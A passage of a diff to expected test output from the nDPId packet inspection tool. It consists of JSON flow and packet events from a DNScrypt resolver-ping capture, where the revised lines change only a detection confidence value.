+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739614411,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739615603,"flow_last_seen":946739615603,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739615603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":946739615603,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739615603,"pkt":"REREREREZmZmZmZmCABFAAJc+DdAAKYRHl4KAAABkFtq4+vpAbsCSL5UGz3LRoQYGq7K1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDCAf8ZxPLtyAmkbotfhN9FBFDCeDP4ncrd\/TOhQoXS6aaK7Qk9xNjCJAE83nYrNPvD\/886RDhSKbcIu9OfJQKTcWCPazM2lBZj5zsNZveK3aqI2jCfxNNTpF+6txS57\/tj1ipnKY33r09Y4upstDW1n4WR1Nsfz7UrdB6\/6T5NqtK9QGMv\/EvcCVnsI4etNtWFQzRfRc7E0Skos7MBtpGgiC86vsChOu7VYwrpe6b0CyOg6OcUDxGDoVs5ICEPVHDsd2RqeGP3QVPcQgf4RCQy1ImYumox7n6l80U\/14hvlajMMIkDpEpiu4KAyZSDWRXbhAD60XmVYOZ0blLEelAzhupD39arDQughZsQic9xuigYdXIQBw\/Fbye0tmt8ihEnYnMhGIlRckiYzkA2ioG3ckpl1JlkazwpX87IXdgB1wqkVRuynhNnc1hxUbpiv0BrBR\/fV0UhwJN\/T1pdWRfFcsSRYMRLW\/ixpyROEV8e41kHMNotPvlHLtOyi\/2lXQAveUUQT3pByUNSr1McJDQGc7QNA5zFLNTZBJqb0kxE\/mLWe0EMXj7XbfUBu7q2gn8G7CETqFs71z\/s7TC\/nsaD\/ETkxWcTnA0aNzC2E\/O5fjyCETbuv3jbGkWzJPfOkBc4w2M9f3qNHjwEkn1LJYLOKWSLyq34DWAVom05p8N+1XzUjvKKpr2SZf2pwRkSXCrFPZsLRFNDkb"} 00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":2,"flow_last_seen":946739615628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739615628,"pkt":"ZmZmZmZmRERERERECABFAAFMVRFAADcRMZWQW2rjCgAAAQG76+kBOCk6cjZmbnZXajggH\/GcTy7cgJpG6LWEOqYXy9eZW2i3Qbkc+\/ab87nm8hxILOmwmIagjS3082zNqzOBnUfDvXH1wdeKy55EXymmAOR3ISimesD3NSPRd1l+RxmfBHNn3a7Bw5aEHaIlwaCNLNQFqK+BhPyPkErS5VbNOhmY5xHp0Ui2kKe72GXKf4WLQR7zh9TTBssKJNiCiW7f2BiWF1TEyHipKDeny4ICpyTd3Wo2+B3IqtOVZ3rHmsTn5k+U7Dl0LO15r3tqh6n0WPCSwFlzqIYmOuOCTIqRIw6ZGfDu889dv4sOKdhqSdpo5gBsF5uRtahg1DOgrYIIV6k+VvSO\/ChUBVAry4GOrZXgTyxKsOYZ+21X5TNc3orLlCmaabkA\/armCA8Dr977H97D0+Y1rw=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"thread_ts_msec":946739615628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"thread_ts_msec":946739615628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739617004,"flow_last_seen":946739617004,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739617004,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":946739617004,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739617004,"pkt":"REREREREZmZmZmZmCABFAAJc+TpAAKYRHVsKAAABkFtq48ULAbsCSL5UGz3LRoQYGq7K1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDMYv6lXLSTAmrdvTCyOYpoj3kt1OReSCqSRptuX3NltyQeLyb5cvSCa8IppjLkWscLpkUyp0EuX0uRM80Z0tP4bkozd9zL82wWjC8W8tmOO4RTgddRqe2OW6UcaHGdoyLPby7WVQbLUZtFO6cYUzbEsqfBQPgCTh\/qKzkBHUUFOcOzpUyI3MqJzYO0+HYvDMlUyYOn02yFtLLa5Pq1FzqbW8q5lSsV54O2im5U817KNJVnj\/1Ex0RZMgloFaQtGlXZoAu0SSgUwvvAL1FO1uoRRAx+AcSeEgZ9dYJhUksMKZOl0pd1gb1y8kNBpupQux9D3tnmm7KlCbGQCOdJ7gfT1HbeHBBq0E1\/iBd8zqzehjb3a24okMSsxmhLmPfcn4P9uZtYdGDWmUahJxq\/ugthfP8l7FCJb27pTFxpBGhYYKBpCs8n66CHCXntWVKyqe9MG6tK4sOASpV12JTr1YNDUpJbbagNSSVC5+IbRWJ9kB5Tr1rdpADAHtTZhkSuXY7lHM\/VYuUqKr1+qXLnLCAo5cFYbfySTD\/RlMa1jGWX7ZjRRid5DRXgauaKlqQZ3kXMkfTFpvDON8m0NTWj9A1FG\/47eQpOKy5YSZ3VSyyGdtTjV5AwxRf0u5j7LIlgeShVaNcOEV16mq+tTopZDdjg\/q8bR3f8vgTH0VjGrhrUoHlYjd9nR+n\/OCx\/s7syonVC6jt\/ML6xGu"} 00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":946739617027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":946739617027,"pkt":"ZmZmZmZmRERERERECABFAAEMVhtAADcRMMuQW2rjCgAAAQG7xQsA+AQwcjZmbnZXajjGL+pVy0kwJq3b0ws3QQmU1oaTmLs\/KBJiu7G8scEX3PGgxPg+ruVnqVNFUraQxsErWYtLItB90wPdHcXiqlBhJWtFp4LLnWAvhKLKhjFEw\/atFhZeDiqXStF1L94cSN904FNHbkEph9CBTREE+edOKfiP4WqHgqjHUNPQp7n\/XDg\/V39BVU7YZKgJKtX72jHsW8p+y1tD4\/oB5Dnpf9M\/FhDm1mUKnuHl2H9\/fkExtOnA6OjnoUWzl+W3CX4dYlGVJl9MVrQvZzZFoWkXil+wG5XW3z1KVD3tlSpd4VUIxP+btk8gcC+s"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739617027,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739617027,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739620053,"flow_last_seen":946739620053,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739620053,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01236{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":946739620053,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739620053,"pkt":"REREREREZmZmZmZmCABFAAJc+yVAAKYRG3AKAAABkFtq45NPAbsCSL5UGz3LRoQYGq7K1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDJIKeRwV+B3o\/S1Vi20pwQIdLtPPzfiWHWJQqFzxTOLyCv2P6iXlQZj5XjV3kgHWrJU4+x22jVmI8HXUQsL4Ett9CycuHxHxWcs\/QYSIRhXy4zBDqi\/TRLgCDvexnLEbWrLVqZlx1oiHSo5WUfrBG87Hnp2cAe\/gsf5JPymP1MD3qdNPqZTHuk8S3o2b7BAHlFbKntVCDBSVQ2u7L9Ln\/6QrREPkeEFI1x9w5DZ5HrdTDgz+nlHzDSJBD364iAl3eoetv8rISqtBsiSLQHroHpiaUZtlR34l9Vzjmefx2nlmLBPG9TXLLZ\/mrHRFJkh\/uUcYYlECvdkuHlyfOYBwWiwoiqEQ+llPw\/pJiTU8CEAtaLv6CbONOtgp6JdiKE6d43D6uaZcFnqBbwg9eaCGVpcGiuUf8O0AgPu2sDwbVkeFGCSP+1RYWtMKN4UHnlXAzPp5xMNSLWhVnOiQOltHL0A4mIocw8NAKgYgB5WImGwHYZJTu3vKHL1ma4UUJgC2aPqavoEA8xSewTk8+kcdCu+H7U80l6uImg5OwmEHjnULbQ0NG6WqqnmnPPxiAFv0OcQF6VQejNwyFXYLHhqFbcBYdLiQUtlr\/CQbqH4bkFMHbjKfSQ5+8dmJhmOjdlgfwyZVo9qRa+DzThEZzNmUms2ITRpkxyxskJfLxizZZ7rIR6efqljBrZaiXsrJyXuIjgdlqkXHyYFN"} 00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":946739620112,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":946739620112,"pkt":"ZmZmZmZmRERERERECABFAADMWFtAADcRLsuQW2rjCgAAAQG7k08AuMXMcjZmbnZXajiSCnkcFfgd6P0tVYuPcDHPBNH+Q2V36ecIOy5+Vn6hASP7zwS+HB7\/COLeZpsYSR\/D4KtiLxFMLHMCSd4CEFa3HkazvGkn1cTMf7cEedRa5ffS2XboBOubQlEIegWZ\/uOw8cxjcAsifupeBdcSOB0uu0iqAXb97mPtwXo9C5m\/fEJEqoOJOH7mervMe4nPhBoqZk\/lTKOfh1zHYDnQCY0xNdH9fhG+JJ4="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402354,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348917,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312183,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317493,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305329,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400550,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305453,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312406,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348917,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317431,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312130,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396210,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 